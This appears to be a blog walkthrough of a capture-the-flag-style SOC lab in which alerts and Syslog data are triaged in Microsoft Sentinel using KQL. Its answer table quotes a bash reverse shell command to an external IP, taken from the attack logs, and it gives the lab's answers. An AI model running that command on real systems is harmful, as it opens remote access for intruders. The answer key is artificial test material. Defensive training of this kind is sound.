Advent of Cyber - DAY-10

🎄 Day 10 – Triaging the Storm: McSkidy vs. the Evil Bunnies in Azure Sentinel

Introduction

At The Best Festival Company (TBFC), the Security Operations Center erupted into chaos. Screens flashed red, alarms echoed like digital thunder, and alerts poured in like a monsoon. Elves sprinted between consoles, their faces illuminated by urgent warnings. Something was clearly wrong.

Rumors soon pointed to a familiar enemy: the Evil Easter Bunnies.

As alerts overwhelmed the SOC, McSkidy knew a crucial rule for survival:

Not every alert deserves your time — triage is everything.

🎯 Learning Objectives

In this exercise, you will learn how to:

  • Perform alert triage and prioritization in a SOC environment

  • Navigate and analyze alerts in Microsoft Sentinel

  • Correlate logs to uncover the true attacker actions

  • Build structured timelines for effective incident response

⚡ Alert Triaging Primer

When alerts flood the SOC, jumping into each one without evaluation leads to chaos. Some alerts are false positives, others are noise, and a few signal a real attack in progress.

Alert triage helps you determine:

  • What must be handled immediately

  • What can safely wait

  • What can be ignored

Without this structured approach, SOC operations become overwhelming.

📝 The Four Dimensions of Triage

FactorDescriptionWhy It Matters
Severity LevelInformational → CriticalIndicates urgency & business risk
Timestamp & FrequencyWhen and how often the alert occurredReveals patterns or ongoing attacks
Attack StageKill-chain stageShows attacker progress
Affected AssetTargeted users, systems, resourcesDetermines potential impact and priority

In short:
Severity = How bad?
Time = When?
Context = Where in the attack lifecycle?
Impact = Who is affected?

🛠️ Investigation Process

Once an alert is prioritized:

  1. Investigate alert details

  2. Check related logs

  3. Correlate alerts across entities

  4. Build a timeline of attacker activity

  5. Decide on escalation, further investigation, or closure

  6. Document findings

This structured workflow allows analysts to convert alert chaos into actionable intelligence.

🔌 Environment Setup in Azure Sentinel

To prepare for triage:

  1. Open Microsoft Sentinel in the Azure portal.

  2. Navigate to Syslog_CL in the Logs tab.

  3. Allow logs to ingest fully.

  4. Go to Analytics → Disable all rules → Re-enable to generate incidents.

The SOC simulation environment is now ready for investigation.

🚨 High-Severity Alerts

In the Incidents tab, McSkidy starts with the highest-severity alerts. One stands out:

Linux Privilege Escalation – Kernel Module Insertion

  • Three related events

  • Three entities involved

  • Classified under Privilege Escalation

  • Recent timestamps indicate an ongoing attack

Example Attack Flow:

AlertIndication
Root SSH login from external IPInitial access
SUID discoveryPrivilege escalation attempt
Kernel module insertionPersistence achieved

The puzzle pieces are coming together.

🔎 Diving Deeper – Raw Log Analysis

Using KQL in Sentinel, McSkidy queries app-02:

set query_now = datetime(2025-10-30T05:09:25.9886229Z);
Syslog_CL
| where host_s == 'app-02'
| project _timestamp_t, host_s, Message

Findings:

  • cp command copying shadow file

  • User Alice added to sudoers

  • backupuser modified by root

  • Malicious kernel module malicious_mod.ko inserted

  • Successful root SSH login

  • Suspicious privilege escalation patterns

These behaviors confirm a coordinated compromise.

✅ Investigation Answers

QuestionAnswer
Kernel module installed in websrv-01?malicious_mod.ko
Unusual command executed by ops user in websrv-01?/bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1
Source IP for first successful SSH login to storage-01?172.16.0.12
External IP that logged in as root to app-01?203.0.113.45
User added to sudoers on app-01 besides backupuser?deploy

🏁 Conclusion

Day 10 highlights the art and science of SOC alert triage. Through Microsoft Sentinel, McSkidy transformed overwhelming alerts into actionable intelligence by:

  • Prioritizing alerts effectively

  • Understanding the context of related events

  • Correlating attacker activity

  • Analyzing logs deeply

  • Mapping the attacker’s sequence

Even clever attackers like the Evil Bunnies can be countered with structured triage and proactive SOC workflows.

Lesson: In a SOC, clarity comes from prioritization. Every alert has a story—your job is to read it carefully.


Comments

Post a Comment

Popular Posts